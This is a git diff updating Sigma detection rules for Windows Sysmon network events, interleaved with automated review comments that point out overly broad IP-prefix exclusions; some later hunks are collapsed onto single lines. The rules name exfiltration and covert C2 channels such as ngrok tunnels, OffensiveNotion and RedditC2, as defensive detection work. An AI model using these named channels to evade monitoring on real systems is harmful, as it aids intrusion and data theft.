-description: 'Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
-
- Msiexec.exe is the command-line utility for the Windows Installer and is thus
- commonly associated with executing installation packages (.msi)
-
- '
+description: |
+ Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.
+ Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)
references:
- https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
diff --git a/sigma/sysmon/network_connection/net_connection_win_ngrok_domains.yml b/sigma/sysmon/network_connection/net_connection_win_ngrok_domains.yml
index b034284d2..4f1336e49 100644
--- a/sigma/sysmon/network_connection/net_connection_win_ngrok_domains.yml
+++ b/sigma/sysmon/network_connection/net_connection_win_ngrok_domains.yml
@@ -1,8 +1,7 @@
title: Communication To Ngrok Domains
id: 18249279-932f-45e2-b37a-8925f2597670
status: test
-description: Detects an executable accessing ngrok domains, which could be a sign
- of forbidden data exfiltration by malicious actors
+description: Detects an executable accessing ngrok domains, which could be a sign of forbidden data exfiltration by malicious actors
references:
- https://ngrok.com/
- https://ngrok.com/blog-post/new-ngrok-domains
diff --git a/sigma/sysmon/network_connection/net_connection_win_ngrok_tunnel.yml b/sigma/sysmon/network_connection/net_connection_win_ngrok_tunnel.yml
index 2ed2b9dd3..d4c8896de 100644
--- a/sigma/sysmon/network_connection/net_connection_win_ngrok_tunnel.yml
+++ b/sigma/sysmon/network_connection/net_connection_win_ngrok_tunnel.yml
@@ -1,8 +1,7 @@
title: Communication To Ngrok Tunneling Service
id: 1d08ac94-400d-4469-a82f-daee9a908849
status: test
-description: Detects an executable accessing an ngrok tunneling endpoint, which could
- be a sign of forbidden exfiltration of data exfiltration by malicious actors
+description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors
references:
- https://twitter.com/hakluke/status/1587733971814977537/photo/1
- https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent
diff --git a/sigma/sysmon/network_connection/net_connection_win_notion_api_susp_communication.yml b/sigma/sysmon/network_connection/net_connection_win_notion_api_susp_communication.yml
index 223012492..aeabd12e7 100644
--- a/sigma/sysmon/network_connection/net_connection_win_notion_api_susp_communication.yml
+++ b/sigma/sysmon/network_connection/net_connection_win_notion_api_susp_communication.yml
@@ -1,8 +1,7 @@
title: Potentially Suspicious Network Connection To Notion API
id: 7e9cf7b6-e827-11ed-a05b-15959c120003
status: experimental
-description: Detects a non-browser process communicating with the Notion API. This
- could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"
+description: Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"
references:
- https://github.com/mttaggart/OffensiveNotion
- https://medium.com/@huskyhacks.mk/we-put-a-c2-in-your-notetaking-app-offensivenotion-3e933bace332
@@ -40,11 +39,11 @@ detection:
filter_main_maxthon:
Image|endswith: \maxthon.exe
filter_main_edge_1:
- - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\
- - Image|endswith: \WindowsApps\MicrosoftEdge.exe
- - Image:
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
- - C:\Program Files\Microsoft\Edge\Application\msedge.exe
+ - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\
+ - Image|endswith: \WindowsApps\MicrosoftEdge.exe
+ - Image:
+ - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
+ - C:\Program Files\Microsoft\Edge\Application\msedge.exe
filter_main_edge_2:
Image|startswith:
- C:\Program Files (x86)\Microsoft\EdgeCore\
@@ -64,8 +63,6 @@ detection:
Image|endswith: \whale.exe
condition: network_connection and (selection and not 1 of filter_main_*)
falsepositives:
- - Legitimate applications communicating with the "api.notion.com" endpoint that
- are not already in the exclusion list. The desktop and browser applications
- do not appear to be using the API by default unless integrations are configured.
+ - Legitimate applications communicating with the "api.notion.com" endpoint that are not already in the exclusion list. The desktop and browser applications do not appear to be using the API by default unless integrations are configured.
level: low
ruletype: Sigma
diff --git a/sigma/sysmon/network_connection/net_connection_win_office_susp_ports.yml b/sigma/sysmon/network_connection/net_connection_win_office_susp_ports.yml
index 474a5ce9d..0b2ef42a2 100644
--- a/sigma/sysmon/network_connection/net_connection_win_office_susp_ports.yml
+++ b/sigma/sysmon/network_connection/net_connection_win_office_susp_ports.yml
@@ -1,8 +1,7 @@
title: Suspicious Office Outbound Connections
id: 3b5ba899-9842-4bc2-acc2-12308498bf42
status: experimental
-description: Detects office suit applications communicating to target systems on uncommon
- ports
+description: Detects office suit applications communicating to target systems on uncommon ports
references:
- https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
author: X__Junior (Nextron Systems)
diff --git a/sigma/sysmon/network_connection/net_connection_win_powershell_network_connection.yml b/sigma/sysmon/network_connection/net_connection_win_powershell_network_connection.yml
index b9685e16b..b45b9448b 100644
--- a/sigma/sysmon/network_connection/net_connection_win_powershell_network_connection.yml
+++ b/sigma/sysmon/network_connection/net_connection_win_powershell_network_connection.yml
@@ -1,8 +1,7 @@
title: PowerShell Initiated Network Connection
id: 1f21ec3f-810d-4b0e-8045-322202e22b4b
status: experimental
-description: Detects a PowerShell process that initiates network connections. Check
- for suspicious target ports and target systems.
+description: Detects a PowerShell process that initiates network connections. Check for suspicious target ports and target systems.
references:
- https://www.youtube.com/watch?v=DLtJTxMWZ2o
author: Florian Roth (Nextron Systems)
@@ -45,18 +44,19 @@ detection:
- 172.30.
- 172.31.
- 127.0.0.1
- User|contains:
+ User|contains: # covers many language settings
- AUTHORI
- AUTORI
filter_main_local_ipv6:
DestinationIp|startswith:
- - ::1
- - 0:0:0:0:0:0:0:1
- - 'fe80:'
- - fc
- - fd
+ - ::1 # IPv6 loopback variant
+ - 0:0:0:0:0:0:0:1 # IPv6 loopback variant
+ - 'fe80:' # link-local address
+ - fc # private address range fc00::/7
+ - fd # private address range fc00::/7
filter_main_msrange:
DestinationIp|startswith:
+ # Subnet: 20.184.0.0/13
- 20.184.
- 20.185.
- 20.186.
@@ -67,6 +67,7 @@ detection:
- 20.191.
- 23.79.
- 51.10.
+ # Subnet: 51.103.210.0/23
- 51.103.
- 51.104.
- 51.105.
@@ -75,7 +76,6 @@ detection:
falsepositives:
- Administrative scripts
- Microsoft IP range
- - Additional filters are required. Adjust to your environment (e.g. extend filters
- with company's ip range')
+ - Additional filters are required. Adjust to your environment (e.g. extend filters with company's ip range')
level: low
ruletype: Sigma
diff --git a/sigma/sysmon/network_connection/net_connection_win_python.yml b/sigma/sysmon/network_connection/net_connection_win_python.yml
index b434b6837..7d5486342 100644
--- a/sigma/sysmon/network_connection/net_connection_win_python.yml
+++ b/sigma/sysmon/network_connection/net_connection_win_python.yml
@@ -1,9 +1,7 @@
title: Python Initiated Connection
id: bef0bc5a-b9ae-425d-85c6-7b2d705980c6
status: experimental
-description: Detects a Python process initiating a network connection. While this
- often relates to package installation, it can also indicate a potential malicious
- script communicating with a C&C server.
+description: Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python
- https://pypi.org/project/scapy/
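Review bot: The added `# Subnet: 51.103.210.0/23` comment in filter_main_msrange does not describe the entry it sits on: `DestinationIp|startswith: 51.103.` drops every PowerShell-initiated connection into 51.103.0.0/16, and the unchanged `51.104.`/`51.105.` entries drop two further /16s, which is a much larger exemption than a /23 for a rule whose whole purpose is to surface PowerShell egress. If the /23 is the intended allow-list, a prefix cannot express it; with a backend that supports the Sigma `cidr` modifier the filter would be `DestinationIp|cidr: 51.103.210.0/23`, and failing that the comment should be honest about the width, e.g. `# 51.103.0.0/16 - prefix match, wider than the Microsoft block`. The filter_main_msrange list begins in the previous hunk.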
@@ -25,18 +23,22 @@ detection:
Initiated: 'true'
Image|contains: python
filter_optional_conda:
+ # Related to anaconda updates. Command example: "conda update conda"
+ # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage
ParentImage: C:\ProgramData\Anaconda3\Scripts\conda.exe
- CommandLine|contains|all:
+ CommandLine|contains|all:
- :\ProgramData\Anaconda3\Scripts\conda-script.py
- update
filter_optional_conda_jupyter_notebook:
+ # Related to anaconda opening an instance of Jupyter Notebook
+ # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage
ParentImage: C:\ProgramData\Anaconda3\python.exe
- CommandLine|contains: C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py
+ CommandLine|contains: C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py
filter_main_local_communication:
+ # This could be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python opening sockets locally etc. So comment this out if you want to monitor for those instances
DestinationIp: 127.0.0.1
SourceIp: 127.0.0.1
- condition: network_connection and (selection and not 1 of filter_main_* and not
- 1 of filter_optional_*)
+ condition: network_connection and (selection and not 1 of filter_main_* and not 1 of filter_optional_*)
falsepositives:
- Legitimate python script
level: medium
diff --git a/sigma/sysmon/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml b/sigma/sysmon/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml
index 669f106bb..e4b068208 100644
--- a/sigma/sysmon/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml
+++ b/sigma/sysmon/network_connection/net_connection_win_rdp_outbound_over_non_standard_tools.yml
@@ -1,8 +1,7 @@
title: Outbound RDP Connections Over Non-Standard Tools
id: ed74fe75-7594-4b4b-ae38-e38e3fd2eb23
status: test
-description: Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible
- lateral movement
+description: Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement
references:
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
author: Markus Neis
@@ -28,6 +27,7 @@ detection:
- C:\Windows\System32\mstsc.exe
- C:\Windows\SysWOW64\mstsc.exe
filter_optional_dns:
+ # https://github.com/SigmaHQ/sigma/pull/2249
Image: C:\Windows\System32\dns.exe
SourcePort: 53
Protocol: udp
@@ -66,13 +66,12 @@ detection:
filter_optional_firefox:
Image: C:\Program Files\Mozilla Firefox\firefox.exe
filter_optional_null:
- Image: null
+ Image:
filter_optional_empty:
Image: ''
filter_optional_unknown:
Image:
- condition: network_connection and (selection and not 1 of filter_main_* and not
- 1 of filter_optional_*)
+ condition: network_connection and (selection and not 1 of filter_main_* and not 1 of filter_optional_*)
falsepositives:
- Third party RDP tools
level: high
diff --git a/sigma/sysmon/network_connection/net_connection_win_rdp_reverse_tunnel.yml b/sigma/sysmon/network_connection/net_connection_win_rdp_reverse_tunnel.yml
index ee59bfac0..6eb1d3cb6 100644
--- a/sigma/sysmon/network_connection/net_connection_win_rdp_reverse_tunnel.yml
+++ b/sigma/sysmon/network_connection/net_connection_win_rdp_reverse_tunnel.yml
@@ -1,8 +1,7 @@
title: RDP Over Reverse SSH Tunnel
id: 5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4
status: test
-description: Detects svchost hosting RDP termsvcs communicating with the loopback
- address and on TCP port 3389
+description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
references:
- https://twitter.com/SBousseaden/status/1096148422984384514
author: Samir Bousseaden
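Review bot: After this change filter_optional_null reads `Image:` (a YAML null), and, as far as the collapsed rendering of the `-66,13 +66,12` hunk lets me tell, the context line under filter_optional_unknown is also a bare `Image:`, which would make the two filters identical and one of them dead. If filter_optional_unknown is meant to match the literal `-` placeholder some log pipelines write for an unknown image, it needs a quoted scalar, `Image: '-'`, because a bare dash is not a valid plain YAML value; worth confirming what the converter actually emitted against the upstream rule. Either way, a one-line comment on each of the three null/empty/unknown filters saying which data source produces that shape (e.g. `# Sysmon EID 3 with no Image field`) would make the trio reviewable. The filter_optional_* block this hunk edits starts well before it.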
@@ -27,8 +26,8 @@ detection:
Initiated: 'true'
SourcePort: 3389
selection2:
- - DestinationIp|startswith: '127.'
- - DestinationIp: ::1
+ - DestinationIp|startswith: '127.'
+ - DestinationIp: ::1
condition: network_connection and (selection and selection2)
falsepositives:
- Unknown
diff --git a/sigma/sysmon/network_connection/net_connection_win_rdp_to_http.yml b/sigma/sysmon/network_connection/net_connection_win_rdp_to_http.yml
index ee7e39d82..5bff364c8 100644
--- a/sigma/sysmon/network_connection/net_connection_win_rdp_to_http.yml
+++ b/sigma/sysmon/network_connection/net_connection_win_rdp_to_http.yml
@@ -1,8 +1,7 @@
title: RDP to HTTP or HTTPS Target Ports
id: b1e5da3b-ca8e-4adf-915c-9921f3d85481
status: test
-description: Detects svchost hosting RDP termsvcs communicating to target systems
- on TCP port 80 or 443
+description: Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
references:
- https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg
- https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling
diff --git a/sigma/sysmon/network_connection/net_connection_win_reddit_api_non_browser_access.yml b/sigma/sysmon/network_connection/net_connection_win_reddit_api_non_browser_access.yml
index 7f7794e45..576c7c059 100644
--- a/sigma/sysmon/network_connection/net_connection_win_reddit_api_non_browser_access.yml
+++ b/sigma/sysmon/network_connection/net_connection_win_reddit_api_non_browser_access.yml
@@ -1,8 +1,7 @@
title: Suspicious Non-Browser Network Communication With Reddit API
id: d7b09985-95a3-44be-8450-b6eadf49833e
status: experimental
-description: Detects an a non-browser process interacting with the Reddit API which
- could indicate use of a covert C2 such as RedditC2
+description: Detects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2
references:
- https://github.com/kleiton0x00/RedditC2
- https://twitter.com/kleiton0x7e/status/1600567316810551296
@@ -22,7 +21,9 @@ detection:
EventID: 3
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- DestinationHostname|contains: reddit.com
+ DestinationHostname|contains: reddit.com # Match with Reddit API when you can
+ # Other browsers or apps known to use reddit should be added
+ # TODO: Add full paths for default install locations
filter_optional_brave:
Image|endswith: \brave.exe
filter_optional_chrome:
@@ -40,11 +41,11 @@ detection:
filter_optional_maxthon:
Image|endswith: \maxthon.exe
filter_optional_edge_1:
- - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\
- - Image|endswith: \WindowsApps\MicrosoftEdge.exe
- - Image:
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
- - C:\Program Files\Microsoft\Edge\Application\msedge.exe
+ - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\
+ - Image|endswith: \WindowsApps\MicrosoftEdge.exe
+ - Image:
+ - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
+ - C:\Program Files\Microsoft\Edge\Application\msedge.exe
filter_optional_edge_2:
Image|startswith:
- C:\Program Files (x86)\Microsoft\EdgeCore\
@@ -64,7 +65,6 @@ detection:
Image|endswith: \whale.exe
condition: network_connection and (selection and not 1 of filter_optional_*)
falsepositives:
- - Legitimate applications communicating with the Reddit API e.g. web browsers
- not in the exclusion list, app with an RSS etc.
+ - Legitimate applications communicating with the Reddit API e.g. web browsers not in the exclusion list, app with an RSS etc.
level: medium
ruletype: Sigma
diff --git a/sigma/sysmon/network_connection/net_connection_win_remote_powershell_session_network.yml b/sigma/sysmon/network_connection/net_connection_win_remote_powershell_session_network.yml
index 4a3b2a53c..b265f49ac 100644
--- a/sigma/sysmon/network_connection/net_connection_win_remote_powershell_session_network.yml
+++ b/sigma/sysmon/network_connection/net_connection_win_remote_powershell_session_network.yml
@@ -1,8 +1,7 @@
title: Remote PowerShell Session (Network)
id: c539afac-c12a-46ed-b1bd-5a5567c9f045
status: test
-description: Detects remote PowerShell connections by monitoring network outbound
- connections to ports 5985 or 5986 from a non-network service account.
+description: Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.
references:
- https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g
@@ -25,20 +24,20 @@ detection:
DestinationPort:
- 5985
- 5986
- Initiated: 'true'
+ Initiated: 'true' # only matches of the initiating system can be evaluated
filter_generic:
- - User|contains:
- - NETWORK SERVICE
- - NETZWERKDIENST
- - SERVIZIO DI RETE
- - SERVICIO DE RED
- - User|contains|all:
- - SERVICE R
- - SEAU
- - SourceIp|startswith: '0:0:'
- - Image:
- - C:\Program Files\Avast Software\Avast\AvastSvc.exe
- - C:\Program Files (x86)\Avast Software\Avast\AvastSvc.exe
+ - User|contains: # covers many language settings for Network Service. Please expand
+ - NETWORK SERVICE
+ - NETZWERKDIENST
+ - SERVIZIO DI RETE
+ - SERVICIO DE RED
+ - User|contains|all:
+ - SERVICE R
+ - SEAU
+ - SourceIp|startswith: '0:0:'
+ - Image:
+ - C:\Program Files\Avast Software\Avast\AvastSvc.exe
+ - C:\Program Files (x86)\Avast Software\Avast\AvastSvc.exe
filter_localhost:
SourceIp:
- ::1
diff --git a/sigma/sysmon/network_connection/net_connection_win_rundll32_net_connections.yml b/sigma/sysmon/network_connection/net_connection_win_rundll32_net_connections.yml
index caa482149..6623cb057 100644
--- a/sigma/sysmon/network_connection/net_connection_win_rundll32_net_connections.yml
+++ b/sigma/sysmon/network_connection/net_connection_win_rundll32_net_connections.yml
@@ -23,38 +23,37 @@ detection:
Image|endswith: \rundll32.exe
Initiated: 'true'
filter:
- - DestinationIp|startswith:
- - '10.'
- - 192.168.
- - 172.16.
- - 172.17.
- - 172.18.
- - 172.19.
- - 172.20.
- - 172.21.
- - 172.22.
- - 172.23.
- - 172.24.
- - 172.25.
- - 172.26.
- - 172.27.
- - 172.28.
- - 172.29.
- - 172.30.
- - 172.31.
- - '127.'
- - '20.'
- - 51.103.
- - 51.104.
- - 51.105.
- - CommandLine|contains: PcaSvc.dll,PcaPatchSdbTask
- - SourceHostname|endswith: .internal.cloudapp.net
+ - DestinationIp|startswith:
+ - '10.'
+ - 192.168.
+ - 172.16.
+ - 172.17.
+ - 172.18.
+ - 172.19.
+ - 172.20.
+ - 172.21.
+ - 172.22.
+ - 172.23.
+ - 172.24.
+ - 172.25.
+ - 172.26.
+ - 172.27.
+ - 172.28.
+ - 172.29.
+ - 172.30.
+ - 172.31.
+ - '127.'
+ - '20.' # Microsoft range, caused some FPs
+ - 51.103. # Microsoft range, caused some FPs
+ - 51.104. # Microsoft range, caused some FPs
+ - 51.105. # Microsoft range, caused some FPs
+ - CommandLine|contains: PcaSvc.dll,PcaPatchSdbTask
+ - SourceHostname|endswith: .internal.cloudapp.net
filter_update_processes:
ParentImage: C:\Windows\System32\svchost.exe
DestinationPort: 443
condition: network_connection and (selection and not 1 of filter*)
falsepositives:
- - Communication to other corporate systems that use IP addresses from public address
- spaces
+ - Communication to other corporate systems that use IP addresses from public address spaces
level: medium
ruletype: Sigma
diff --git a/sigma/sysmon/network_connection/net_connection_win_script.yml b/sigma/sysmon/network_connection/net_connection_win_script.yml
index e9966c94d..1cb6671c2 100644
--- a/sigma/sysmon/network_connection/net_connection_win_script.yml
+++ b/sigma/sysmon/network_connection/net_connection_win_script.yml
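Review bot: The new `# Microsoft range, caused some FPs` comment on `- '20.'` understates how much that entry exempts: `DestinationIp|startswith: '20.'` silences rundll32.exe connections to all of 20.0.0.0/8, whereas the dllhost and PowerShell rules in this same update enumerate only `20.184.` through `20.191.` (20.184.0.0/13) for the Microsoft block, and the three `51.10x.` entries each exempt a full /16. For a proxy-execution binary that is a large blind spot; I would narrow the entry to the same eight prefixes and make the comment carry the width, e.g. `- 20.184. # Microsoft 20.184.0.0/13, caused some FPs`. Note also that `CommandLine|contains` and, in filter_update_processes, `ParentImage` are fields the python rule in this update says Sysmon EID 3 does not carry, so those filters are likely no-ops on unenriched data (unchanged context, so hedged). The selection this filter applies to starts before the hunk.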
@@ -1,8 +1,7 @@
title: Script Initiated Connection
id: 08249dc0-a28d-4555-8ba5-9255a198e08c
status: test
-description: Detects a script interpreter wscript/cscript opening a network connection.
- Adversaries may use script to download malicious payloads.
+description: Detects a script interpreter wscript/cscript opening a network connection. Adversaries may use script to download malicious payloads.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md
author: frack113
diff --git a/sigma/sysmon/network_connection/net_connection_win_script_wan.yml b/sigma/sysmon/network_connection/net_connection_win_script_wan.yml
index 1e3608dde..40073ae50 100644
--- a/sigma/sysmon/network_connection/net_connection_win_script_wan.yml
+++ b/sigma/sysmon/network_connection/net_connection_win_script_wan.yml
@@ -1,8 +1,7 @@
title: Script Initiated Connection to Non-Local Network
id: 992a6cae-db6a-43c8-9cec-76d7195c96fc
status: test
-description: Detects a script interpreter wscript/cscript opening a network connection
- to a non-local network. Adversaries may use script to download malicious payloads.
+description: Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md
author: frack113, Florian Roth
@@ -29,15 +28,21 @@ detection: - '10.' - '172.' - '192.' - - 169.254. - - '20.' + - 169.254. # 169.254.0.0/16 + - '20.' # Microsoft Range filter_ipv6: DestinationIp|startswith: - - ::1 - - 0:0:0:0:0:0:0:1 - - 'fe80:' - - fc - - fd + - ::1 # IPv6 loopback variant + - 0:0:0:0:0:0:0:1 # IPv6 loopback variant + - 'fe80:' # link-local address + - fc # private address range fc00::/7 + - fd # private address range fc00::/7 +# filter_lan_cidr: +# DestinationIp|cidr: +# - '127.0.0.0/8' +# - '10.0.0.0/8' +# - '172.16.0.0/12' +# - '192.168.0.0/16' condition: network_connection and (selection and not 1 of filter*) falsepositives: - Legitimate scripts diff --git a/sigma/sysmon/network_connection/net_connection_win_susp_binary_no_cmdline.yml b/sigma/sysmon/network_connection/net_connection_win_susp_binary_no_cmdline.yml index 1639cef38..ad667d99f 100644 --- a/sigma/sysmon/network_connection/net_connection_win_susp_binary_no_cmdline.yml +++ b/sigma/sysmon/network_connection/net_connection_win_susp_binary_no_cmdline.yml @@ -1,8 +1,7 @@ title: Suspicious Network Connection Binary No CommandLine id: 20384606-a124-4fec-acbb-8bd373728613 status: test -description: Detects suspicious network connections made by a well-known Windows binary - run with no command line parameters +description: Detects suspicious network connections made by a well-known Windows binary run with no command line parameters references: - https://redcanary.com/blog/raspberry-robin/ author: Florian Roth (Nextron Systems) @@ -23,14 +22,14 @@ detection: - \regsvr32.exe - \rundll32.exe - \dllhost.exe - CommandLine|endswith: + CommandLine|endswith: - \regsvr32.exe - \rundll32.exe - \dllhost.exe filter_no_cmdline: - CommandLine: '' - filter_null: - CommandLine: null + CommandLine: '' + filter_null: # e.g. Sysmon has no CommandLine field in network events with ID 3 + CommandLine: condition: network_connection and (selection and not 1 of filter*) falsepositives: - Unknown 
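Review bot: `'172.'` and `'192.'` in the `DestinationIp|startswith` list (context lines in this hunk) exclude 172.0.0.0/8 and 192.0.0.0/8 rather than 172.16.0.0/12 and 192.168.0.0/16, and the newly commented `'20.'` excludes all of 20.0.0.0/8, so the "non-local network" this rule watches is missing large public blocks. The `filter_lan_cidr` block added in this hunk as comments states the intended ranges precisely with `|cidr`; if it has to stay disabled for backend reasons, a comment saying so would help, and the prefix list should be narrowed to dot-terminated `172.16.`–`172.31.` and `192.168.` entries as the rundll32 rule earlier in this patch does. The start of the filter list and the selection are outside the hunk.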
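Review bot: `filter_null:` now reads `CommandLine:` with no value instead of `CommandLine: null`; both load as a YAML null, but the bare key reads like an unfinished mapping, so `CommandLine: null` is the clearer spelling and keeps the null-match intent visible. The same rewrite appears in the epmap rule (`filter_image_null1: Image:`) and the wuauclt rule (`filter_main_cli_null: CommandLine:`) later in this patch. The added comment `# e.g. Sysmon has no CommandLine field in network events with ID 3` is useful and could be extended to say that the selection's `CommandLine|endswith` clause depends on that enrichment (how it combines with the `Image|endswith` clause is above the hunk, so I cannot confirm the exact effect).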
diff --git a/sigma/sysmon/network_connection/net_connection_win_susp_dropbox_api.yml b/sigma/sysmon/network_connection/net_connection_win_susp_dropbox_api.yml index 715178566..4ffd4d176 100644 --- a/sigma/sysmon/network_connection/net_connection_win_susp_dropbox_api.yml +++ b/sigma/sysmon/network_connection/net_connection_win_susp_dropbox_api.yml @@ -1,8 +1,7 @@ title: Suspicious Dropbox API Usage id: 25eabf56-22f0-4915-a1ed-056b8dae0a68 status: test -description: Detects an executable that isn't dropbox but communicates with the Dropbox - API +description: Detects an executable that isn't dropbox but communicates with the Dropbox API references: - https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb - https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east diff --git a/sigma/sysmon/network_connection/net_connection_win_susp_epmap.yml b/sigma/sysmon/network_connection/net_connection_win_susp_epmap.yml index f3851f177..a762ff330 100644 --- a/sigma/sysmon/network_connection/net_connection_win_susp_epmap.yml +++ b/sigma/sysmon/network_connection/net_connection_win_susp_epmap.yml @@ -1,8 +1,7 @@ title: Suspicious Epmap Connection id: 628d7a0b-7b84-4466-8552-e6138bc03b43 status: experimental -description: Detects suspicious "epmap" connection to a remote computer via remote - procedure call (RPC) +description: Detects suspicious "epmap" connection to a remote computer via remote procedure call (RPC) references: - https://github.com/RiccardoAncarani/TaskShell/ author: frack113, Tim Shelton (fps) @@ -22,12 +21,13 @@ detection: Protocol: tcp Initiated: 'true' DestinationPort: 135 + # DestinationPortName: epmap filter_image: Image|startswith: - C:\Windows\ - C:\ProgramData\Amazon\SSM\Update\amazon-ssm-agent-updater filter_image_null1: - Image: null + Image: filter_image_null2: Image: '' filter_image_unknown: 
diff --git a/sigma/sysmon/network_connection/net_connection_win_susp_external_ip_lookup.yml b/sigma/sysmon/network_connection/net_connection_win_susp_external_ip_lookup.yml index 4844f47ab..cae0ba12a 100644 --- a/sigma/sysmon/network_connection/net_connection_win_susp_external_ip_lookup.yml +++ b/sigma/sysmon/network_connection/net_connection_win_susp_external_ip_lookup.yml @@ -1,12 +1,10 @@ title: Suspicious Network Connection to IP Lookup Service APIs id: edf3485d-dac4-4d50-90e4-b0e5813f7e60 related: - - id: ec82e2a5-81ea-4211-a1f8-37a0286df2c2 - type: derived + - id: ec82e2a5-81ea-4211-a1f8-37a0286df2c2 + type: derived status: experimental -description: Detects external IP address lookups by non-browser processes via services - such as "api.ipify.org". This could be indicative of potential post compromise - internet test activity. +description: Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity. references: - https://github.com/rsp/scripts/blob/c8bb272d68164a9836e4f273d8f924927f39b8c6/externalip-benchmark.md - https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a @@ -79,11 +77,11 @@ detection: filter_optional_maxthon: Image|endswith: \maxthon.exe filter_optional_edge_1: - - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ - - Image|endswith: \WindowsApps\MicrosoftEdge.exe - - Image: - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - - C:\Program Files\Microsoft\Edge\Application\msedge.exe + - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ + - Image|endswith: \WindowsApps\MicrosoftEdge.exe + - Image: + - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe + - C:\Program Files\Microsoft\Edge\Application\msedge.exe filter_optional_edge_2: Image|startswith: - C:\Program Files (x86)\Microsoft\EdgeCore\ 
diff --git a/sigma/sysmon/network_connection/net_connection_win_susp_malware_callback_port.yml b/sigma/sysmon/network_connection/net_connection_win_susp_malware_callback_port.yml index ec24a5442..4f5cb8af6 100644 --- a/sigma/sysmon/network_connection/net_connection_win_susp_malware_callback_port.yml +++ b/sigma/sysmon/network_connection/net_connection_win_susp_malware_callback_port.yml @@ -1,13 +1,11 @@ title: Potentially Suspicious Malware Callback Communication id: 4b89abaa-99fe-4232-afdd-8f9aa4d20382 related: - - id: 6d8c3d20-a5e1-494f-8412-4571d716cf5c - type: similar + - id: 6d8c3d20-a5e1-494f-8412-4571d716cf5c + type: similar status: test -description: 'Detects programs that connect to known malware callback ports based - on statistical analysis from two different sandbox system databases - - ' +description: | + Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases references: - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo author: Florian Roth (Nextron Systems) @@ -105,8 +103,7 @@ detection: - 172.30. - 172.31. - 192.168. - condition: network_connection and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: network_connection and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: high diff --git a/sigma/sysmon/network_connection/net_connection_win_susp_malware_callback_ports_uncommon.yml b/sigma/sysmon/network_connection/net_connection_win_susp_malware_callback_ports_uncommon.yml index d1133a7f3..c6e8dbfb8 100644 --- a/sigma/sysmon/network_connection/net_connection_win_susp_malware_callback_ports_uncommon.yml +++ b/sigma/sysmon/network_connection/net_connection_win_susp_malware_callback_ports_uncommon.yml 
